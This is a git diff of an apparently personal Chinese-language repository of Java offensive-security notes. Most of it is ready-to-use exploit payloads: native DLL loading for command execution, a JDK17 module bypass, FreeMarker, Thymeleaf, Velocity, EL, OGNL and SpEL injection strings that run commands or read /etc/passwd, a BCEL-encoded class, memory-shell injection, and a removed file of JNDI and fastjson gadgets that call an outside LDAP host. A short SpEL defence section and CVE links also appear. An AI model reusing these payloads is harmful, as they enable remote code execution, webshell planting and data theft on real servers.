(UnsatisfiedLinkError e){ + e.printStackTrace(); +} +``` + +2.Runtime.getRuntime().load + +```java +Runtime.getRuntime().load("D:\\temp\\calc_x64.dll"); +``` + +3.com.sun.glass.utils.NativeLibLoader.loadLibrary + +```java +com.sun.glass.utils.NativeLibLoader.loadLibrary("\\..\\..\\..\\..\\..\\..\\..\\..\\temp\\calc_x64"); +``` + +有限制 + +1. 存在于jdk\javafx-src.zip!\com\sun\glass\utils\NativeLibLoader.java,在不同的版本的jdk中javafx并不是都存在的。 +2. NativeLibLoader会首先在jdk环境下找文件名,如果需要自定义路径必须使用../的方式进行目录穿越。并且如果是windows的话,只能穿越到JDK所在的盘符的根目录下。举例说明,如果JDK安装在`D:/java/JDK/`下,那么只能穿越到D盘的任意目录下面,比例说穿越到D:/temp/目录下,文件名参数就只能写成**../../../../temp/calc**,文件名还不能跟后缀,不然传入文件名会被变成**calc.dll.dll**。相对而言Linux平台是可以穿越任意目录的。 + +4.反射模拟底层调用 + +- 如果模拟ClassLoader加载就会存在两个方案 + - 模拟ClassLoader的loadLibrary和loadLibrary0两个方案。 +- 如果模拟NativeLibrary就只存在load方法 + +**ClassLoader#loadLibrary** + +```java +try { + Class clazz = Class.forName("java.lang.ClassLoader"); + Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class); + method.setAccessible(true); + method.invoke(null, clazz, "D:\\temp\\calc_x64.dll", true); +}catch (Exception e){ + e.printStackTrace(); +} +``` + +**NativeLibrary#load** + +```java +String file = "D:\\temp\\calc_x64.dll"; +Class a = Class.forName("java.lang.ClassLoader$NativeLibrary"); +Constructor con = a.getDeclaredConstructor(new Class[]{Class.class,String.class,boolean.class}); +con.setAccessible(true); +Object obj = con.newInstance(JDKClassLoaderBypass.class,file,true); +Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class); +method.setAccessible(true); +method.invoke(obj, file, false); +``` + +```java +String file = "D:\\temp\\calc_x64.dll"; +Class aClass = Class.forName("sun.misc.Unsafe"); +Constructor declaredConstructor = aClass.getDeclaredConstructor(); +declaredConstructor.setAccessible(true); +Unsafe unsafe = (Unsafe)declaredConstructor.newInstance(); +Object obj = unsafe.allocateInstance(a); +Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class); +method.setAccessible(true); +method.invoke(obj, file, false); +``` + diff --git "a/java\346\227\245\345\270\270/jdk17\347\273\225\350\277\207Module.md" "b/java\346\227\245\345\270\270/jdk17\347\273\225\350\277\207Module.md" new file mode 100644 index 0000000..dbd2d4e --- /dev/null +++ "b/java\346\227\245\345\270\270/jdk17\347\273\225\350\277\207Module.md" @@ -0,0 +1,99 @@ +# jdk17 bypass module + +https://www.bennyhuo.com/2021/10/02/Java17-Updates-06-internals/ + +https://github.com/BeichenDream/Kcon2021Code/blob/master/bypassJdk/JdkSecurityBypass.java + +在jdk17使用反序列化的时候发现要报错 + +``` +InvokerTransformer: The method 'newTransformer' on 'class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' cannot be accessed +``` + +![image-20221220230825845](img/image-20221220230825845.png) + +限制了 + +![image-20221220233047039](img/image-20221220233047039.png) + +限制了的类https://cr.openjdk.java.net/~mr/jigsaw/jdk8-packages-strongly-encapsulated + +## 需要bypass + +``` +按照提案的说明,被严格限制的这些内部 API 包括: + +java.* 包下面的部分非 public 类、方法、属性,例如 Classloader 当中的 defineClass 等等。 +sun.* 下的所有类及其成员都是内部 API。 +绝大多数 com.sun.* 、 jdk.* 、org.* 包下面的类及其成员也是内部 API。 +``` + +**code** + +```java + +import sun.misc.Unsafe; +import java.lang.reflect.Field; +import java.lang.reflect.Method; +import java.util.ArrayList; + +/** + * https://cr.openjdk.java.net/~mr/jigsaw/jdk8-packages-strongly-encapsulated + */ +public class BypassModule { + public static void main(String[] args) throws Exception { + final ArrayList classes = new ArrayList<>(); + classes.add(Class.forName("java.lang.reflect.Field")); + classes.add(Class.forName("java.lang.reflect.Method")); + Class aClass = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"); + classes.add(aClass); + new BypassModule().bypassModule(classes); + aClass.newInstance(); + } + + public void bypassModule(ArrayList classes){ + try { + Unsafe unsafe = getUnsafe(); + Class currentClass = this.getClass(); + try { + Method getModuleMethod = getMethod(Class.class, "getModule", new Class[0]); + if (getModuleMethod != null) { + for (Class aClass : classes) { + Object targetModule = getModuleMethod.invoke(aClass, new Object[]{}); + unsafe.getAndSetObject(currentClass, unsafe.objectFieldOffset(Class.class.getDeclaredField("module")), targetModule); + } + } + }catch (Exception e) { + } + }catch (Exception e){ + e.printStackTrace(); + } + } + + private static Method getMethod(Class clazz,String methodName,Class[] params) { + Method method = null; + while (clazz!=null){ + try { + method = clazz.getDeclaredMethod(methodName,params); + break; + }catch (NoSuchMethodException e){ + clazz = clazz.getSuperclass(); + } + } + return method; + } + + private static Unsafe getUnsafe() { + Unsafe unsafe = null; + try { + Field field = Unsafe.class.getDeclaredField("theUnsafe"); + field.setAccessible(true); + unsafe = (Unsafe) field.get(null); + } catch (Exception e) { + throw new AssertionError(e); + } + return unsafe; + } +} +``` + diff --git "a/java\346\227\245\345\270\270/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" "b/java\346\227\245\345\270\270/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" new file mode 100644 index 0000000..7eda739 --- /dev/null +++ "b/java\346\227\245\345\270\270/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" @@ -0,0 +1,16 @@ +# spel防御 + +最直接的防御方法就是使用`SimpleEvaluationContext`替换`StandardEvaluationContext`。 + +官方文档:[SimpleEvaluationContext的API官方文档](https://links.jianshu.com/go?to=https%3A%2F%2Fdocs.spring.io%2Fspring%2Fdocs%2F5.0.6.RELEASE%2Fjavadoc-api%2Forg%2Fspringframework%2Fexpression%2Fspel%2Fsupport%2FSimpleEvaluationContext.html) + +![image-20220325230922109](img/image-20220325230922109.png) + +SimpleEvaluationContext和StandardEvaluationContext是SpEL提供的两个EvaluationContext: + +- SimpleEvaluationContext - 针对不需要SpEL语言语法的全部范围并且应该受到有意限制的表达式类别,公开SpEL语言特性和配置选项的子集。 +- StandardEvaluationContext - 公开全套SpEL语言功能和配置选项。您可以使用它来指定默认的根对象并配置每个可用的评估相关策略。 + +SimpleEvaluationContext旨在仅支持SpEL语言语法的一个子集,不包括 Java类型引用、构造函数和bean引用;而StandardEvaluationContext是支持全部SpEL语法的。 + +http://rui0.cn/archives/1043 \ No newline at end of file diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/FreeMarker/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/FreeMarker/Readme.md" new file mode 100644 index 0000000..fd33fdb --- /dev/null +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/FreeMarker/Readme.md" @@ -0,0 +1,9 @@ +# FreeMarker + +读文件 +``` +[#assign ctx=springMacroRequestContext.webApplocationContext/] +[#assign url=ctx.getResource('file:///etc/passwd')/] +[#assign is = url.getInputStream()/] +[#list 1..url.contentLength() as i]${is.read()}[/#list] +``` diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" index d69975f..cfc36e4 100644 --- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" @@ -2,6 +2,7 @@ >https://github.com/lufeirider/BypassShell/blob/master/JAVA/JAVA.md +>https://gosecure.github.io/template-injection-workshop/#0 + [FreeMarker模板注入](FreeMarker) 后缀名.ftl @@ -10,6 +11,7 @@ + [Velocity模板注入](Velocity) **2021 四川省比赛省赛非攻Java logiclogic** 后缀名.vm [wp](https://mp.weixin.qq.com/s?__biz=MzI3NDEzNzIxMg==&mid=2650481832&idx=2&sn=7b092fc6e26c7d5f131b8ef7a30dc85c&chksm=f3172dbbc460a4ad99f29b445dd92873304d7c34798f977695ba775a5096a6b707106190a09f&mpshare=1&scene=23&srcid=0924Bci6wWhHifB6Y7Cmc5hl&sharer_sharetime=1632452737857&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) + [beetl模板注入](Beetl) + [jfinalcms enjoy](jfinalcms_enjoy) **2021 字节ctf考察过。** ++ [Java FreeMarker 模板引擎注入深入分析](https://mp.weixin.qq.com/s/aYTp0suulfjQ5dcocS33Kg) ------------------------------------------------------------------------------------------------------------------------- # SSTI diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Thymeleaf/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Thymeleaf/Readme.md" new file mode 100644 index 0000000..1f606b5 --- /dev/null +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Thymeleaf/Readme.md" @@ -0,0 +1,8 @@ +# 绕过文章 + + ++ [记一次实战之若依SSTI注入绕过玄某盾](https://mp.weixin.qq.com/s/7TCZDkfCXlmEhcTb85fw_Q) + +```java +__${T%20(%0aRuntime%09).%0dgetRuntime%0a(%09)%0d.%00exec('calc')}__::.x +``` diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" new file mode 100644 index 0000000..9c7d898 --- /dev/null +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" @@ -0,0 +1,11 @@ +# 真实例子 + +Confluence CVE-2019-3396 + +Jira CVE-2019-11581 + +框架中的利用: + +https://xz.aliyun.com/t/11832 + +配合了fastjson 反序列化生成对象之后调用方法 diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/exp.txt" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/exp.txt" index e347b8a..2879893 100644 --- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/exp.txt" +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/exp.txt" @@ -4,3 +4,11 @@ $bizBean.class.class.forName('java.lang.Runtime').getMethod('getRuntime', null). #set($e="e") ${e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("calc")} +回显 +#set($x='') #set($rt=$x.class.forName('java.lang.Runtime')) +#set($chr=$x.class.forName('java.lang.Character')) +#set($str=$x.class.forName('java.lang.String')) +#set($ex=$rt.getRuntime().exec('id')) $ex.waitFor() +#set($out=$ex.getInputStream()) +#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read())) +#end diff --git a/jndi-gadgets.md b/jndi-gadgets.md deleted file mode 100644 index bad3ffb..0000000 --- a/jndi-gadgets.md +++ /dev/null @@ -1,33 +0,0 @@ -``` -{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["ldap://1.116.136.120:1600/TomcatBypass/TomcatEcho"],"Realms":[""],"a":"a"} - -{"object":["com.mchange.v2.c3p0.JndiRefForwardingDataSource",{"jndiName":"rmi://localhost:8088/Exploit", "loginTimeout":0}]} - -InputStream in = new FileInputStream("C3P0.ser"); -byte[] data = toByteArray(in); -in.close(); -String HexString = bytesToHexString(data, data.length); -String poc = "{\"object\":[\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\",{\"userOverridesAsString\":\"HexAsciiSerializedMap:"+ HexString + ";\"}]}"; -System.out.println(poc); - -public static byte[] toByteArray(InputStream in) throws IOException { - byte[] classBytes; - classBytes = new byte[in.available()]; - in.read(classBytes); - in.close(); - return classBytes; -} - -public static String bytesToHexString(byte[] bArray, int length) { - StringBuffer sb = new StringBuffer(length); - for(int i = 0; i < length; ++i) { - String sTemp = Integer.toHexString(255 & bArray[i]); - if (sTemp.length() < 2) { - sb.append(0); - } - - sb.append(sTemp.toUpperCase()); - } - return sb.toString(); -} -``` diff --git a/shell/EL/Readme.md b/shell/EL/Readme.md index a693272..dfd1a79 100644 --- a/shell/EL/Readme.md +++ b/shell/EL/Readme.md @@ -1,5 +1,7 @@ # EL +https://xz.aliyun.com/t/7692 + ## 回显 https://forum.butian.net/share/886 @@ -29,3 +31,19 @@ byte[] array = ByteBuffer.allocate(100).array(); whoami.read(array, 0, whoami1); System.out.println(new String(array)); ``` +## 加载字节码 + ++ [Java el 2.1 表达式注入payload(复现上古版本nexus rce)](https://mp.weixin.qq.com/s?__biz=MzIzOTE1ODczMg==&mid=2247485253&idx=1&sn=b1490922c8b4dfcfde6cfdf425ea8597&chksm=e92f13e6de589af00713b3584841d20c209bf361fe1a1c2fa53e7f37432d7728da008bafde35&scene=178&cur_album_id=1359948349721460737#rd) +``` +${''.class.forName('com.sun.org.apache.bcel.internal.util.ClassLoader').newInstance().loadClass('$$BCEL$$$l$8b$I$I$7c$m$n_$A$Deval$$class$A$8dT$5bO$TQ$Q$fe$O$ddv$cb$b2$U$u$d7$827$f0$c2B$vU$f1$da$o$m$V$US$c1$80$c14$3em$b7$87$ba$a4$ddm$b6$5b$c2$3f$f2Uc$d2$gI$7c$f4$c1$9f$e2$8fP$e7l$97$5eB$8d$b6$e9$cc93$df$99$f9f$e6$9c$fe$f8$f5$f5$h$80$3bx$a9$60$Y$8b2$e2$K$fa$84$5e$92$91P$b0$8c$a4$Q$b7$VB$dcU$Q$c4$8a$C$J$f7$84$b8$_$80$P$c2x$u$f4$p$Z$8fe$a4$YB$ab$a6e$bak$M$Bm$e1$90A$ca$d8$F$ce0$945$z$be$5b$x$e7$b9$f3F$cf$97$c8$S$cd$da$86$5e$3a$d4$jS$ec$7d$a3$e4$be7$ab$U$p$cbO$f4R$9a$f6$fc$94$h$M$b7$b4$ec$b1$7e$a2$tK$baUL$k$b8$8ei$V$d3$L$XM$94$d3$u$XD$e8$k$ae$c1$aa$b7$da$ac$99$a5$Cw$Yb$X$40$be$8b$b0$91$7c$ed$e8$88$3b$bc$b0$cfu$P$3c$d5$E$9bvr$b3$cb$p$u$96$a82$ca$ecp$o$ael$9d$g$bc$e2$9a$b6U$95$n$9ce$dd$b4$Y$s$b4w$3d$K$Q$dd$d1$9d$o$j$h$ed$e1$a6$60$Hv$cd1$f8$b6$v$3a$d3$_$3a$b2$yP$wF$Qe$98$fc$L$7d$ca$d6$9b$x$95$7c$ee$d8$b1$w5$97Nq$bd$dc$f4$c9XU$f1$Ek$w$a6$b0$$cC$c5Sl$8aD$Z$n$9e$a9$d8$c2$b6$8a$e7x$c1$c0$U$V$3b$d8$W$b3$nF$M$c3m$k$7b$f9cn$b8TN$x$cf$5e$ab$l$M$pm$e0$7e$cdr$cd2U$a5$U$b9$db$da$8ck$9d3$f5$cd$d4$87$f9$7fL$ff$b5c$h$bcZMw$a5$f0$8d4KJ$d1Q$_5$ee$3cMw$p$e8$f8$94$d6$d3$n$G5$dav$f9$93$X$d60$f9$LYo$fecZ$cf$L$Z$d2$x$Vn$d1$9dL$fc$d7$Vn_$c1$b0k7M$98$c5$Q$3dL$f1$J$80$89$d9$93$i$a5$dd$KiF$3a$b8$d8$A$fbD$8b$3e$8c$91$U$8f$91$8c$f4$3ee$8c$d3Jm$820$81I$d2T$qb$84$Q$B$3e$pD_$ms$86$be$5c$D$81Wg$90rg$I$e6$be$m$U$afC$ae$p$dc$40$7f$D$can$a2$8e$81$5cJ$fa$8e$e8RL$aaC$8d$O$92x$fb$e1$f7$cf$a5$3a$o$a9$60$y$f8$b1$95$7e$da$L$a9$m$8c$Bb$3e$888$oH$R$ff$Nb$$$e8$ac5S$fat$c4j$g3D$x$8c4$$$e12E$99$c5$i$ae$e0$wU$ab$91$e7$g$fd$q$3a$j$m$fb$M$951Gg$q$c2_G$3fn$e0$a6$df$8b$b8W$g$3a$fb$Q$f2$Mc$j$3d$a0$ff$R$cc$7bZ$f3P$L$7f$A$f1$e1$81$9c$fb$E$A$A').newInstance().exec('whoami')} +``` +**需要注意jdk版本问题可能没有bcel类** +理论上spel表达式可以用的payLoad 这里也可以利用 +## bypass + +https://forum.butian.net/share/1880 +```java +${""[param.a]()[param.b](param.c)[param.d]()[param.e](param.f)[param.g](param.h)} +``` + +https://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html diff --git a/shell/Groovy/readme.md b/shell/Groovy/readme.md new file mode 100644 index 0000000..1f20d18 --- /dev/null +++ b/shell/Groovy/readme.md @@ -0,0 +1,3 @@ +Groovy 安全 + +https://xz.aliyun.com/t/10703 diff --git a/shell/OGNL/Readme.md b/shell/OGNL/Readme.md index cfcbb9b..9b83e7d 100644 --- a/shell/OGNL/Readme.md +++ b/shell/OGNL/Readme.md @@ -1,9 +1,15 @@ # OGNL bypass ```java +${@jdk.jshell.JShell@create().eval('java.lang.Runtime.getRuntime().exec("")} + new javax.script.ScriptEngineManager().getEngineByName("js").eval(此处的Payload可以进行unicode编码) new javax.script.ScriptEngineManager().getEngineByName("js").eval("new j\u0061va.lang.ProcessBuilder['(java.l\u0061ng.String[])'](['cmd.exe','/c','calc']).start()\u003B"); +可参考s2的exp +jdk9+ +@jdk.jshell.Jshell@create().eval('code'); +${(#cls = #this.getClass().forName("java.lang.Runtime")).(#rt=#cls.getDeclaredMethod("getRuntime",null).invoke(null,null)).(#exec=#cls.getDeclaredMethod("exec", this.getClass().forName("[Ljava.lang.String;"))).(#exec.invoke(#rt,"calc".split(",")))} ``` ## bypass sm 参考 js的bypass @@ -35,3 +41,9 @@ String bypass_sm_exp = "var str = Java.type('java.lang.String[]').class;" + >参考 >https://www.sec-in.com/article/753 >https://www.mi1k7ea.com/2020/03/16/OGNL%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/ +## Bypass + +https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/ + +## mybatis 存在${}的ognl +参考2022的d3ctf ezsql diff --git a/shell/Readme.md b/shell/Readme.md index b234df4..9f01e86 100644 --- a/shell/Readme.md +++ b/shell/Readme.md @@ -33,3 +33,6 @@ public void cmd(@RequestParam String command) throws Exception { Command = "ping 127.0.0.1"+request.getParameter("cmd"); Runtime.getRuntime().exec(command); ``` +## webshell 管理工具 + ++ [菜刀HTTP流量中转代理过WAF](https://xz.aliyun.com/t/2739) **现在来说就是bx和gsl了** diff --git a/shell/SPEL/Readme.md b/shell/SPEL/Readme.md index 9cceae9..e989f3e 100644 --- a/shell/SPEL/Readme.md +++ b/shell/SPEL/Readme.md @@ -1,5 +1,7 @@ # SPEL +>new关键字大小写可以绕过 + ## poc ```java @@ -43,6 +45,9 @@ T(org.springframework.util.SerializationUtils).deserialize(T(com.sun.org.apache. //内存木马 回显 T(org.springframework.cglib.core.ReflectUtils).defineClass('Singleton',T(com.sun.org.apache.xml.internal.security.utils.Base64).decode('yv66vgAAADIAtQ....'),T(org.springframework.util.ClassUtils).getDefaultClassLoader()) +#{T(org.springframework.cglib.core.ReflectUtils).defineClass('Memshell',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAA....'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()} + +${''.getClass().forName('java.script.ScriptEngineManager').newInstance().getEngineByName("nashorn").eval(#request.getHeader('User-Agent'))} echo @@ -78,7 +83,10 @@ T(java.nio.file.Files).write(T(java.nio.file.Paths).get(T(java.net.URI).create(" Nuxeo RCE ''['class'].forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(''['class'].forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),'curl 172.17.0.1:9898') - + +jdk9+ + +T(jdk.jshell.JShell).Methods[6].invoke(null,'').eval('xxxx'); ``` 字符串绕过 @@ -102,8 +110,19 @@ print(')}') 防御方式是使用`SimpleEvaluationContext`来禁用其敏感的功能,从而阻止表达式注入执行问题的出现。 -## 参考 +其他bypass: https://xz.aliyun.com/t/9245 + +https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/ + +## springboot回显 +``` +Java.type("org.springframework.web.context.request.RequestContextHolder").currentRequestAttributes().getResponse().addHeader("test",new java.lang.String(Java.type("sun.misc.IOUtils").readFully(new java.io.FileInputStream("/flag"),1024,false))); +``` + +## 参考 +> https://xz.aliyun.com/t/9245 **可以使用#request.getRequestedSessionId() 或者 #request.getHeader('User-Agent') 反正可以使用request对象或者respose** +> >https://www.cnblogs.com/bitterz/p/15206255.html > >https://landgrey.me/blog/15/ diff --git a/tomcat/README.md b/tomcat/README.md index 1747bb3..c38371f 100644 --- a/tomcat/README.md +++ b/tomcat/README.md @@ -3,3 +3,6 @@ Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持,最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现,Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性能稳定,而且免费,因而深受Java 爱好者的喜爱并得到了部分软件开发商的认可,成为目前比较流行的Web 应用服务器Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。对于一个初学者来说,可以这样认为,当在一台机器上配置好Apache 服务器,可利用它响应HTML(标准通用标记语言下的一个应用)页面的访问请求。实际上Tomcat是Apache 服务器的扩展,但运行时它是独立运行的,所以当你运行tomcat 时,它实际上作为一个与Apache 独立的进程单独运行的 ![](./img/1.png) + + +[复现tomcat远程代码执行漏洞CVE-2016-8735](https://gv7.me/articles/2018/CVE-2016-8735/) diff --git a/tomcat/Smuggling/CVE-2021-33037.md b/tomcat/Smuggling/CVE-2021-33037.md new file mode 100644 index 0000000..7905c08 --- /dev/null +++ b/tomcat/Smuggling/CVE-2021-33037.md @@ -0,0 +1,4 @@ +Apache Tomcat HTTP请求走私(CVE-2021-33037)漏洞分析 + + +[Apache Tomcat HTTP请求走私(CVE-2021-33037)漏洞分析](https://xz.aliyun.com/t/9866) diff --git a/tomcat/Smuggling/CVE-2022-42252.md b/tomcat/Smuggling/CVE-2022-42252.md new file mode 100644 index 0000000..5430463 --- /dev/null +++ b/tomcat/Smuggling/CVE-2022-42252.md @@ -0,0 +1,3 @@ +https://www.xujun.org/note-154484.html + +![image](https://user-images.githubusercontent.com/63966847/201358116-b7c2e4de-0c57-461d-86b5-d370b62a5b6d.png) diff --git a/wso2/Readme.md b/wso2/Readme.md new file mode 100644 index 0000000..1e02983 --- /dev/null +++ b/wso2/Readme.md @@ -0,0 +1,25 @@ +# wso2 + +## CVE-2022-29464 + +### 文件上传 + +路径匹配处理类 + +![image](https://user-images.githubusercontent.com/63966847/198697817-2f3055f2-5918-4336-bf73-71e500a1050b.png) + +![image](https://user-images.githubusercontent.com/63966847/198697831-7aeb695f-b02d-4a77-a403-562a37b4245f.png) + +### fix + +1.加了权限认证 + +2.对上传文件的路径做校验 + +### 参考 + +https://github.com/wso2/carbon-kernel/pull/3152/commits/13795df0a5b6a2206fd0338abfff057a7b99e1bb + +https://docs.wso2.com/m/mobile.action#page/180952746 + +https://www.anquanke.com/post/id/273528?from=timeline